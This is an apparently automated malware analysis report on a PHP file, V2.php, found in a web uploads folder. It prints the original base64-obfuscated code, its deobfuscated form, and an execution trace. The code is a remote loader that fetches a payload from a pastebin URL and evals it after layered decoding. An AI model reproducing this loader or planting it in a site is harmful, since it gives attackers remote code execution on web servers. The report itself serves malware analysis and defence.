PHP Malware Analysis

V2.php

md5: 9432c7f167aaf04d7a9e05de01599995


Attributes

Encoding

Execution

Files

URLs


Deobfuscated PHP code

<?php

$auth_pass = "48ba8138756afc71fa1b3c37fa27d2a5";
// default: V2
eval /* PHPDeobfuscator eval output */ {
    $noname = file_get_contents('http://pastebin.com/raw/W9ZcmJHk');
    eval(str_rot13(gzinflate(str_rot13(base64_decode($noname)))));
};

Execution traces

data/traces/9432c7f167aaf04d7a9e05de01599995_trace-1676242154.8764.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 20:49:40.774210]
1	0	1	0.000224	393464
1	3	0	0.000283	393680	{main}	1		/var/www/html/uploads/V2.php	0	0
1		A						/var/www/html/uploads/V2.php	2	$auth_pass = '48ba8138756afc71fa1b3c37fa27d2a5'
2	4	0	0.000317	393680	base64_decode	0		/var/www/html/uploads/V2.php	3	1	'JG5vbmFtZSA9IGZpbGVfZ2V0X2NvbnRlbnRzKCdodHRwOi8vcGFzdGViaW4uY29tL3Jhdy9XOVpjbUpIaycpOw0KZXZhbChzdHJfcm90MTMoZ3ppbmZsYXRlKHN0cl9yb3QxMyhiYXNlNjRfZGVjb2RlKCRub25hbWUpKSkpKTs='
2	4	1	0.000340	393936
2	4	R			'$noname = file_get_contents(\'http://pastebin.com/raw/W9ZcmJHk\');\r\neval(str_rot13(gzinflate(str_rot13(base64_decode($noname)))));'
2	5	0	0.000390	395640	eval	1	'$noname = file_get_contents(\'http://pastebin.com/raw/W9ZcmJHk\');\r\neval(str_rot13(gzinflate(str_rot13(base64_decode($noname)))));'	/var/www/html/uploads/V2.php	3	0
3	6	0	0.000409	395640	file_get_contents	0		/var/www/html/uploads/V2.php(3) : eval()'d code	1	1	'http://pastebin.com/raw/W9ZcmJHk'
3	6	1	0.073878	398816
3	6	R			FALSE
2		A						/var/www/html/uploads/V2.php(3) : eval()'d code	1	$noname = FALSE
3	7	0	0.073932	398776	base64_decode	0		/var/www/html/uploads/V2.php(3) : eval()'d code	2	1	FALSE
3	7	1	0.073948	398840
3	7	R			''
3	8	0	0.073962	398808	str_rot13	0		/var/www/html/uploads/V2.php(3) : eval()'d code	2	1	''
3	8	1	0.073976	398840
3	8	R			''
3	9	0	0.073988	398776	gzinflate	0		/var/www/html/uploads/V2.php(3) : eval()'d code	2	1	''
3	9	1	0.074010	398808
3	9	R			FALSE
3	10	0	0.074023	398776	str_rot13	0		/var/www/html/uploads/V2.php(3) : eval()'d code	2	1	FALSE
3	10	1	0.074036	398808
3	10	R			''
2	5	1	0.074051	398808
1	3	1	0.074059	396960
			0.074092	317392
TRACE END   [2023-02-12 20:49:40.848120]


Generated HTML code

<html><head></head><body></body></html>

Original PHP code

<?php
$auth_pass = "48ba8138756afc71fa1b3c37fa27d2a5"; // default: V2
eval(base64_decode(("JG5vbmFtZSA9IGZpbGVfZ2V0X2NvbnRlbnRzKCdodHRwOi8vcGFzdGViaW4uY29tL3Jhdy9XOVpjbUpIaycpOw0KZXZhbChzdHJfcm90MTMoZ3ppbmZsYXRlKHN0cl9yb3QxMyhiYXNlNjRfZGVjb2RlKCRub25hbWUpKSkpKTs=")));